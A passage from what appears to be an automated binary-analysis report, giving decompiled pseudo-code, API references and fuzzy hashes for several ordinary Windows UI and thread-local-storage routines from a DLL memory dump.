					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E10010363(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E1001154F(_t89) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t93 = _t75;
					if(_t75 == 0) {
						E1000A5CD(_t75, _t81, _t85, _t89, _t93);
					}
					_t81 = _t75;
					if(E10012311(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E1000EBE9(_t75, _t81, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E10010363(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}

0x1001332e
0x10013339
0x1001333b
0x10013341
0x10013344
0x10013497
0x10013497
0x10013351
0x10013357
0x1001335a
0x10013367
0x10013379
0x1001337c
0x10013381
0x100133ed
0x100133ed
0x100133ed
0x100133f1
0x100133fb
0x10013451
0x10013458
0x10013462
0x10013462
0x1001346a
0x10013470
0x10013470
0x10013478
0x1001347e
0x10013484
0x1001348d
0x1001348d
0x10013484
0x00000000
0x10013494
0x10013404
0x1001340a
0x10013416
0x1001341a
0x10013440
0x10013440
0x10013443
0x10013447
0x1001344b
0x1001344f
0x00000000
0x00000000
0x00000000
0x1001344f
0x1001341c
0x10013421
0x00000000
0x1001342f
0x10013432
0x10013437
0x10013439
0x10013439
0x1001343e
0x00000000
0x00000000
0x00000000
0x00000000
0x1001343e
0x10013421
0x10013385
0x1001338a
0x1001338c
0x10013395
0x100133ab
0x100133ab
0x00000000
0x10013397
0x10013397
0x10013399
0x1001339b
0x1001339b
0x100133a0
0x100133a9
0x100133af
0x100133af
0x100133b4
0x100133ba
0x100133b6
0x100133b6
0x100133b6
0x100133c4
0x100133cb
0x100133cf
0x100133d5
0x100133d1
0x100133d1
0x100133d1
0x100133da
0x100133e7
0x100133e7
0x100133da
0x00000000
0x100133cb
0x00000000
0x100133a9

APIs

GetKeyState.USER32(00000001), ref: 1001333B
GetCursorPos.USER32(?), ref: 1001335A
ScreenToClient.USER32 ref: 10013367
GetCapture.USER32 ref: 100133BD

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

ClientToScreen.USER32(?,?), ref: 10013404
WindowFromPoint.USER32(?,?), ref: 10013410
IsChild.USER32(?,00000000), ref: 10013425
KillTimer.USER32(?,0000E001), ref: 10013462
KillTimer.USER32(?,0000E000), ref: 1001347E

Part of subcall function 1001154F: GetForegroundWindow.USER32(?,?,1001CD7F,?,?,1001CA6F,?,?,?,?,?,10006AC9,?,?,?), ref: 10011563
Part of subcall function 1001154F: GetLastActivePopup.USER32(?), ref: 10011574

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
String ID:
API String ID: 1544770960-0
Opcode ID: 89dbbadf00b1aae0317630321864f551c0e7be6f9df6451246e5b94dbbebfa7f
Instruction ID: 3a7ab3ad0dad1b9624d588d353c797029d5116bb9727d58bf3e4e4c184e438f5
Opcode Fuzzy Hash: 89dbbadf00b1aae0317630321864f551c0e7be6f9df6451246e5b94dbbebfa7f
Instruction Fuzzy Hash: E8416331A00615EFDB11DF65CC88A9E7BB5FF44364F118664E4A6DB2A1EB31EE818B01

Uniqueness

Uniqueness Score: -1.00%

Function 10028A53, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10028A53(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10041CDE(0x100532a3, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100286D3(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1005b6d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10028805( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E10009B7D(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E10009B7D(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A595(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10041630(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10041D83(_t36);
			}

0x10028a53
0x10028a5a
0x10028a5f
0x10028a61
0x10028a64
0x10028a68
0x10028a6b
0x10028a71
0x10028a78
0x10028b79
0x10028a87
0x10028a8f
0x10028a93
0x10028ac7
0x10028aca
0x10028acf
0x10028ad1
0x10028add
0x10028add
0x10028ad3
0x10028ad3
0x10028ad9
0x10028ad9
0x10028adf
0x10028ae4
0x10028ae7
0x10028aea
0x10028aed
0x00000000
0x10028a95
0x10028a95
0x10028a9b
0x10028aaa
0x10028aaa
0x10028aad
0x10028b11
0x10028b17
0x10028b1c
0x10028aaf
0x10028ab4
0x10028aba
0x10028abd
0x10028abd
0x10028b22
0x10028b24
0x10028b29
0x10028b2f
0x10028b2f
0x10028b37
0x10028b48
0x10028b54
0x10028b59
0x10028b5f
0x10028b5f
0x10028a9b
0x10028b62
0x10028b67
0x10028b71
0x10028b71
0x10028b74
0x10028b74
0x10028b7a
0x10028b85

APIs

__EH_prolog3_catch.LIBCMT ref: 10028A5A
EnterCriticalSection.KERNEL32(?,00000010,10028C23,?,00000000,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028A6B
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000,?,?,1000B502,1000112A), ref: 10028A89
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028ABD
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000,?,?,1000B502), ref: 10028B29
_memset.LIBCMT ref: 10028B48
TlsSetValue.KERNEL32(?,00000000), ref: 10028B59
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000,?,?,1000B502,1000112A), ref: 10028B7A

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: a744a5a55590471ffd758cfc2e30b75992b8bb781cd4535bafd74ceaf0539d7f
Instruction ID: 441ad70aca0f162629193cbd24c71adc28905ac7655a3be7423a55b78dfe1ecf
Opcode Fuzzy Hash: a744a5a55590471ffd758cfc2e30b75992b8bb781cd4535bafd74ceaf0539d7f
Instruction Fuzzy Hash: 27318DB9501A16EFEB11DF60EC85C5AB7B4FF48350B61C62DF51A97560CB30AE50CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2C7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000A2C7(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				long _t72;
				void* _t73;
				void* _t74;
				signed int _t76;
				void* _t77;
				signed int _t81;

				_t70 = __edx;
				_t79 = _t81;
				_t36 =  *0x1006d940; // 0xc2bf211
				_v8 = _t36 ^ _t81;
				_t72 = _a4;
				_t76 = 0;
				_v288 = _a8;
				E1000A1DC(__ecx, 0);
				_t66 = _t71;
				_t62 = E1000A215(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t76;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t76 = _t72 + 0x78;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t76 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t76 != 0) {
							_v276 =  *_t76;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t76 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t96 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							_t72 = 0x104;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t73 = E1000A145(_t63, _t66, _t72, _t76, _t96);
						if(_t76 != 0) {
							 *_t76 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E1000A1DC(_t66, 1);
						_pop(_t74);
						_pop(_t77);
						_pop(_t64);
						return E1003F29E(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
					}
				}
			}

0x1000a2c7
0x1000a2ca
0x1000a2d2
0x1000a2d9
0x1000a2e2
0x1000a2e5
0x1000a2e8
0x1000a2ee
0x1000a2f3
0x1000a301
0x1000a303
0x1000a30f
0x1000a314
0x1000a314
0x1000a31a
0x1000a328
0x1000a330
0x1000a358
0x1000a358
0x1000a35a
0x1000a35c
0x1000a35c
0x00000000
0x1000a340
0x1000a34a
0x1000a352
0x00000000
0x1000a354
0x1000a354
0x1000a35f
0x1000a35f
0x1000a368
0x1000a36c
0x1000a372
0x1000a377
0x1000a37e
0x1000a37e
0x1000a377
0x1000a384
0x1000a389
0x1000a38f
0x1000a39f
0x1000a39f
0x1000a39f
0x1000a391
0x1000a397
0x1000a399
0x1000a399
0x1000a397
0x1000a38f
0x1000a3a3
0x1000a3aa
0x1000a3ac
0x1000a3b3
0x1000a3b9
0x1000a3ca
0x1000a3cc
0x1000a3ce
0x1000a3ce
0x1000a3ae
0x1000a3ae
0x1000a3ae
0x1000a3d2
0x1000a3d5
0x1000a3d6
0x1000a3dc
0x1000a3ea
0x1000a3ee
0x1000a3f6
0x1000a3f6
0x1000a3ff
0x1000a409
0x1000a409
0x1000a411
0x1000a41c
0x1000a41d
0x1000a420
0x1000a427
0x1000a427
0x1000a352

APIs

Part of subcall function 1000A215: GetParent.USER32(1000343D), ref: 1000A269
Part of subcall function 1000A215: GetLastActivePopup.USER32(1000343D), ref: 1000A27A
Part of subcall function 1000A215: IsWindowEnabled.USER32(1000343D), ref: 1000A28E
Part of subcall function 1000A215: EnableWindow.USER32(1000343D,00000000), ref: 1000A2A1

EnableWindow.USER32(?,00000001), ref: 1000A314
GetWindowThreadProcessId.USER32(?,?), ref: 1000A328
GetCurrentProcessId.KERNEL32 ref: 1000A332
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 1000A34A
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000A3C4
EnableWindow.USER32(00000000,00000001), ref: 1000A409

Strings

0, xrefs: 1000A39F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: de40bd5c7f278446d34706614c951c8f3407380f259fa54057951e40d7e548dc
Instruction ID: 9fc36f3c663abb839c3e900647257a3641111e49ad594c689a96b1b73af6fdbc
Opcode Fuzzy Hash: de40bd5c7f278446d34706614c951c8f3407380f259fa54057951e40d7e548dc
Instruction Fuzzy Hash: BC4181719003289BEB21CF24CC86BDE77F4EB56790F100698FA55A7185E7B09EC08F90

Uniqueness

Uniqueness Score: -1.00%

Function 10008FD0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008FD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* __ebp;
				signed int _t28;
				intOrPtr _t39;
				intOrPtr _t64;
				intOrPtr _t67;

				_v28 = __ecx;
				_t28 = E10025AF0(_v28, __eflags, _a4);
				if(_t28 != 0xffffffff) {
					_v8 = _v28;
					_v12 = E1000B1CC(__ebx, _v28, __edi, __esi, __eflags, GetDC( *(_v8 + 0x20)));
					_v16 =  ~(MulDiv(0xa, GetDeviceCaps( *(_v12 + 4), 0x5a), 0x48));
					_t39 = E1000B49C(__ebx, _v28 + 0x88, __edi, CreateFontA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, "COURIER"));
					__eflags = _t39;
					if(_t39 == 0) {
						_t67 = _v28 + 0x88;
						__eflags = _t67;
						_v20 = _t67;
						 *((intOrPtr*)(_v20 + 4)) = GetStockObject(0xb);
					}
					_t64 = _v28 + 0x88;
					__eflags = _t64;
					_v24 = _t64;
					if(_t64 != 0) {
						_v32 =  *((intOrPtr*)(_v24 + 4));
					} else {
						_v32 = 0;
					}
					SendMessageA( *(_v8 + 0x20), 0x30, _v32, 1);
					__eflags = 0;
					return 0;
				}
				return _t28 | 0xffffffff;
			}

0x10008fd6
0x10008fe0
0x10008fe8
0x10008ff5
0x1000900b
0x1000902a
0x10009065
0x1000906a
0x1000906c
0x10009071
0x10009071
0x10009077
0x10009085
0x10009085
0x1000908b
0x1000908b
0x10009091
0x10009094
0x100090a5
0x10009096
0x10009096
0x10009096
0x100090b7
0x100090bd
0x00000000
0x100090bd
0x00000000

APIs

GetDC.USER32(?), ref: 10008FFF
GetDeviceCaps.GDI32(?,0000005A), ref: 10009019
MulDiv.KERNEL32(0000000A,00000000), ref: 10009022
CreateFontA.GDI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,COURIER), ref: 10009055
GetStockObject.GDI32(0000000B), ref: 1000907C
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 100090B7

Strings

COURIER, xrefs: 1000902D

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontMessageObjectSendStock
String ID: COURIER
API String ID: 317129860-4032213606
Opcode ID: 4948afc1f48f201f42d4f9ebf894a1dce68cf44149823ce65dd02870068b34a6
Instruction ID: 1b356a63d98d534444c0f4a74b57d7a00fb64f54faee1a227afb28a335105393
Opcode Fuzzy Hash: 4948afc1f48f201f42d4f9ebf894a1dce68cf44149823ce65dd02870068b34a6
Instruction Fuzzy Hash: 2A311EB0A40205AFEB04DFA4CC46F7F7BB9EB88301F10C559F615AB2C5DA719D018B94

Uniqueness

Uniqueness Score: -1.00%

Function 10001580, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001580(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				void* __ebp;
				signed int _t25;
				intOrPtr _t36;
				intOrPtr _t43;
				intOrPtr _t64;

				_v24 = __ecx;
				_t25 = E1000EB43(_v24, __eflags);
				if(_t25 != 0xffffffff) {
					_v8 = E1000B1CC(__ebx,  *(_v24 + 0x20), __edi, __esi, __eflags, GetDC( *(_v24 + 0x20)));
					_v12 =  ~(MulDiv(0xa, GetDeviceCaps( *(_v8 + 4), 0x5a), 0x48));
					_t36 = E1000B49C(__ebx, _v24 + 0x54, __edi, CreateFontA(_v12, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, "TAHOMA"));
					__eflags = _t36;
					if(_t36 == 0) {
						_t43 = _v24 + 0x54;
						__eflags = _t43;
						_v16 = _t43;
						 *((intOrPtr*)(_v16 + 4)) = GetStockObject(0xb);
					}
					_t64 = _v24 + 0x54;
					__eflags = _t64;
					_v20 = _t64;
					if(_t64 != 0) {
						_v28 =  *((intOrPtr*)(_v20 + 4));
					} else {
						_v28 = 0;
					}
					SendMessageA( *(_v24 + 0x20), 0x30, _v28, 1);
					E10001470(_v24);
					__eflags = 0;
					return 0;
				}
				return _t25 | 0xffffffff;
			}

0x10001586
0x1000158c
0x10001594
0x100015b1
0x100015d0
0x10001608
0x1000160d
0x1000160f
0x10001614
0x10001614
0x10001617
0x10001625
0x10001625
0x1000162b
0x1000162b
0x1000162e
0x10001631
0x10001642
0x10001633
0x10001633
0x10001633
0x10001654
0x1000165d
0x10001662
0x00000000
0x10001662
0x00000000

APIs

GetDC.USER32(?), ref: 100015A5
GetDeviceCaps.GDI32(?,0000005A), ref: 100015BF
MulDiv.KERNEL32(0000000A,00000000), ref: 100015C8
CreateFontA.GDI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,TAHOMA), ref: 100015FB
GetStockObject.GDI32(0000000B), ref: 1000161C
SendMessageA.USER32(00000001,00000030,?,00000001), ref: 10001654

Strings

TAHOMA, xrefs: 100015D3

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontMessageObjectSendStock
String ID: TAHOMA
API String ID: 317129860-572809434
Opcode ID: 2b1abfbe2736168270580d8f9cdf10ce9717e1583a702be6c6cef52e82e4cf2d
Instruction ID: f9ba9eeba9b849cd5e11a9089c0e50f23888dbda88f1b55dc2d87f5147acae85
Opcode Fuzzy Hash: 2b1abfbe2736168270580d8f9cdf10ce9717e1583a702be6c6cef52e82e4cf2d
Instruction Fuzzy Hash: 7A3132B4A40205AFEB04CFA4CD46FBF77B5EF48701F148259F915AB2C5DA71AD008B65

Uniqueness

Uniqueness Score: -1.00%

Function 1000A215, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A215(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E1000A139();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E10003110();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}

0x1000a222
0x1000a228
0x1000a245
0x1000a253
0x1000a25e
0x1000a25e
0x1000a260
0x1000a264
0x1000a26f
0x1000a273
0x1000a280
0x1000a280
0x1000a282
0x1000a287
0x1000a28b
0x1000a2a9
0x1000a29c
0x1000a29f
0x1000a2a1
0x1000a2a1
0x1000a28b
0x1000a2b2
0x00000000
0x00000000
0x00000000
0x1000a266
0x1000a266
0x1000a267
0x1000a269
0x1000a26b
0x00000000
0x1000a266
0x1000a258
0x1000a25a
0x1000a25c
0x00000000
0x00000000
0x00000000
0x1000a25c
0x1000a22a
0x1000a231
0x1000a240
0x1000a240
0x00000000
0x1000a240
0x1000a233
0x1000a23a
0x00000000
0x00000000
0x1000a23c
0x00000000

APIs

GetWindowLongA.USER32 ref: 1000A248
GetParent.USER32(1000343D), ref: 1000A256
GetParent.USER32(1000343D), ref: 1000A269
GetLastActivePopup.USER32(1000343D), ref: 1000A27A
IsWindowEnabled.USER32(1000343D), ref: 1000A28E
EnableWindow.USER32(1000343D,00000000), ref: 1000A2A1

Strings

$=4, xrefs: 1000A282

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID: $=4
API String ID: 670545878-2337901349
Opcode ID: 49d75ce074e1a86abe266cf533106d7fda27eeda5894a19dc853a837ef8add02
Instruction ID: ad1cfdbe780be60364248c3bcc6ac04a7db260a0bd1422b8be76cdd1cf6f4b47
Opcode Fuzzy Hash: 49d75ce074e1a86abe266cf533106d7fda27eeda5894a19dc853a837ef8add02
Instruction Fuzzy Hash: 13114F32A016729BF7629A6D9C85B5A73D8EF5BAE0F120335ED04A720CDB36DDC14291

Uniqueness

Uniqueness Score: -1.00%

Function 10008290, Relevance: 12.3, APIs: 8, Instructions: 252
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008290(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				long _v52;
				signed int _v56;
				intOrPtr _v60;
				long _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v92;
				int _v96;
				int _v100;
				void* __ebp;
				signed int _t102;
				void* _t107;
				long _t108;
				intOrPtr _t135;
				signed int _t136;
				signed int _t157;
				signed int _t226;
				signed int _t229;
				signed int _t236;
				void* _t237;
				void* _t238;

				_t234 = __edi;
				_t158 = __ebx;
				_t238 = _t237 - 0x54;
				_t102 =  *0x1006d940; // 0xc2bf211
				 *[fs:0x0] =  &_v16;
				_v92 = __ecx;
				_v36 = 0xc8;
